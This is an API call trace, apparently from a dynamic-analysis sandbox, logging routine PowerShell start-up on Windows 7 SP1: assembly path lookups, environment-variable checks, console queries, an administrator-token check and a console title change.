	[0277.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0277.577] SetErrorMode (uMode=0x1) returned 0x1
	[0277.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12d7e0 | out: lpFileInformation=0x12d7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0277.578] SetErrorMode (uMode=0x1) returned 0x1
	[0279.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.142] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.142] CoTaskMemFree (pv=0x3a7210) 
	[0279.145] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.145] CoTaskMemFree (pv=0x3a7210) 
	[0279.145] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.146] CoTaskMemFree (pv=0x3a7210) 
	[0279.148] CoCreateGuid (in: pguid=0x12dba8 | out: pguid=0x12dba8*(Data1=0x9089d733, Data2=0x4a54, Data3=0x400b, Data4=([0]=0xad, [1]=0xa3, [2]=0xa, [3]=0x5e, [4]=0x21, [5]=0x24, [6]=0x28, [7]=0x8))) returned 0x0
	[0279.686] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.686] CoTaskMemFree (pv=0x3a7210) 
	[0279.689] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.689] CoTaskMemFree (pv=0x3a7210) 
	[0279.691] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0279.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0279.691] CoTaskMemFree (pv=0x3a7210) 
	[0279.698] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0279.700] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12d850 | out: lpConsoleScreenBufferInfo=0x12d850) returned 1
	[0279.707] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0279.708] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12d850 | out: lpConsoleScreenBufferInfo=0x12d850) returned 1
	[0279.709] GetVersionExW (in: lpVersionInformation=0x12d7e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12d7e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0279.712] GetCurrentProcess () returned 0xffffffffffffffff
	[0279.713] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12d878 | out: TokenHandle=0x12d878*=0x324) returned 1
	[0279.717] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d798 | out: TokenInformation=0x0, ReturnLength=0x12d798) returned 0
	[0279.718] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x317290
	[0279.718] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x317290, TokenInformationLength=0x4, ReturnLength=0x12d798 | out: TokenInformation=0x317290, ReturnLength=0x12d798) returned 1
	[0279.720] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12d8f8 | out: phNewToken=0x12d8f8*=0x320) returned 1
	[0279.720] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d798 | out: TokenInformation=0x0, ReturnLength=0x12d798) returned 0
	[0279.720] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3172c0
	[0279.720] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x3172c0, TokenInformationLength=0x4, ReturnLength=0x12d798 | out: TokenInformation=0x3172c0, ReturnLength=0x12d798) returned 1
	[0279.722] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2ccfb68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12d908 | out: IsMember=0x12d908) returned 1
	[0279.722] CloseHandle (hObject=0x320) returned 1
	[0279.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0279.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0280.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0280.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0280.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0280.998] CoTaskMemAlloc (cb=0x804) returned 0x1b7ad880
	[0280.998] GetConsoleTitleW (in: lpConsoleTitle=0x1b7ad880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0280.999] CoTaskMemFree (pv=0x1b7ad880) 
	[0281.022] CoTaskMemAlloc (cb=0x804) returned 0x1b7ae130
	[0281.022] GetConsoleTitleW (in: lpConsoleTitle=0x1b7ae130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0281.022] CoTaskMemFree (pv=0x1b7ae130) 
	[0281.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.025] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0281.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0281.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0282.812] SetConsoleCtrlHandler (HandlerRoutine=0x29e68dc, Add=1) returned 1
	[0282.826] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1cc
	[0282.827] CoCreateGuid (in: pguid=0x12d9f0 | out: pguid=0x12d9f0*(Data1=0x3882f53e, Data2=0x5453, Data3=0x425a, Data4=([0]=0xa1, [1]=0x10, [2]=0x5a, [3]=0xa9, [4]=0x88, [5]=0x26, [6]=0x14, [7]=0x90))) returned 0x0
	[0282.828] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0282.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0282.828] CoTaskMemFree (pv=0x3a7210) 
	[0283.334] WinSqmIsOptedIn () returned 0x0
	[0283.335] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.336] CoTaskMemFree (pv=0x3a7210) 
	[0283.339] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.339] CoTaskMemFree (pv=0x3a7210) 
	[0283.341] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.341] CoTaskMemFree (pv=0x3a7210) 
	[0283.342] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.343] CoTaskMemFree (pv=0x3a7210) 
	[0283.344] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.344] CoTaskMemFree (pv=0x3a7210) 
	[0283.349] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.349] CoTaskMemFree (pv=0x3a7210) 
	[0283.354] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.354] CoTaskMemFree (pv=0x3a7210) 
	[0283.917] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.917] CoTaskMemFree (pv=0x3a7210) 
	[0283.922] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.922] CoTaskMemFree (pv=0x3a7210) 
	[0283.929] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.929] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.929] CoTaskMemFree (pv=0x3a7210) 
	[0283.930] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.930] CoTaskMemFree (pv=0x3a7210) 
	[0283.930] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0283.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0283.930] CoTaskMemFree (pv=0x3a7210) 
	[0286.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0288.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
